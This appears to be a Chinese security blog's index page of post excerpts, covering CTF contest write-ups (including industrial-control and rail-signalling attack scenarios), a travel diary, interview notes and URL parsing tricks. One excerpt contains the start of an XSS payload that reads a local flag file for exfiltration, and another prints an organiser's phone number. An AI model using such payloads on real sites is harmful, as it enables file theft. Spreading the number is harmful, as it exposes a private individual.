合肥纪行 序 填之前的坑了，顺便把一些有的没的记录一下，以后也可以翻翻 合肥安徽省省会，因淝、施二水交汇而得名，位于中国中部，长江淮河之间、巢湖之滨，具有承东启西、接连中原、贯通南北的重要区域优势，是全省政治、经济、文化、信息、金融和商业贸易中心，也是全国重要的科研教育基地。 合肥是一座具有2000多年历史的古城，素有“三国故地、包拯家乡”之称。曾…

2023-鹏城杯决赛wp-day3 最终成绩 石油石化自动控制安全2 该场景是模拟天然气采集、输送和净化的生产工艺流程，主要生产设备包括采气井、测量仪表、管道、锅炉、脱硫装置、脱水装置。靶标设备为工程师站实物和生产控制系统（PAC）实物。选手对需现场控制逻辑进行篡改，实现危险操作。选手需要提交报告说明整个过程。该场景需要完成石油石化自动控制安全1后…

鹏城杯2023wp-决赛-深圳-day2 轨道交通列控场景（1000分拿满） 渗透测试 1000 描述： 该场景模拟了监测网络和生产网络为两个网络，攻击者需通过监测系统网络向列车运行控制系统网络渗透的场景。 要求选手首先攻陷联锁设备（地址：192.168.11.103），以联锁设备为跳板进一步渗透生产网区域；选手需要攻陷调度服务器，通过调度软件为列…

鹏城杯2023wp-决赛-深圳-day1 手册 大家有些选手不及时 出席的 ，第一次进入鹏城实验室 没有腕带 就报来由，还是不行 就大打 选手手册 中 留的 紧急联系电话：18529592717（李老师） 大家注意哈，明天比赛 请从 上图中的 鹏城实验室 东门进入，门卫统一在 东门 审核身份，提问来由请回复“参加鹏城杯决赛，已报备”。感谢您的配合！…

xctf-TPCTF wp 还得是xctf，现在xctf的web题都没web界面了屌 XSSBOT 想法很简单，直接读文件然后外带 <img src="xasdasdasd" onerror="document.write('<iframe src=file:///flag></ifr…

2023强网拟态线上预选赛wp 不说了放图，前12晋级，不知道怎么顺延到咱第20的 还真是，好怪哦，再看一眼！ oumisotuitennnoka 非预期做法，感谢@micgo，学弟越来越屌了 <?php highlight_file(__FILE__); $dir = '/tmp'; $htContent = <&…

鹏城杯2023wp 介绍 一年一度的在深圳鹏城实验室的暑假到秋季举办的线下比赛，去年比赛以渗透赛为主，有非常趣味的体验，今年则增加了很多工控，实车，5G的场景 这个是线上比赛Aurora的wp，最终线上比赛的成绩，【aurora】和【大家好我是超威蓝猫】都晋级了，可以领到每人1k的低保，好开心！ web-web1 H::desturct->H…

xctf-actf-wp 前言 最终成绩是21名 第一天面试去了，早上和晚上抽空看了下做出了craftcms （非预期解法,因为预期解法打不通） 第二天白天睡了一天（连续一个星期8点钟起床高强度面试，顶不住了），凌晨2点打到7点出了Ave Mujica's Masquerade，然后倒头就睡到深夜 边面试边比赛真的很难顶，好在这次题目质量非常不错！…

2023秋招校招面经之路 前言 2023.11.8 笔者认为互联网秋招基本结束，虽然他本人仍然杳无音讯。 笔者身为0offer选手不敢给大伙建议，故以下面经一改往日”一面试一准备“风格，尽量客观记录，仅供参考 美团 笔试 8.12 2道ac，1道50%（原因是没看数据长度，忽略了int长度限制，改为long就能ac），1道36%(但是本地过了，不懂…

URL 变形记 url语法 通用语法<scheme>://<user>:<password>@<host>:<port>/<url-path> ,其中scheme包含http、ftp、gopher、file 等网络协议 漏洞条件 黑盒 单点登陆的服务器下，登陆请求会存在?ser…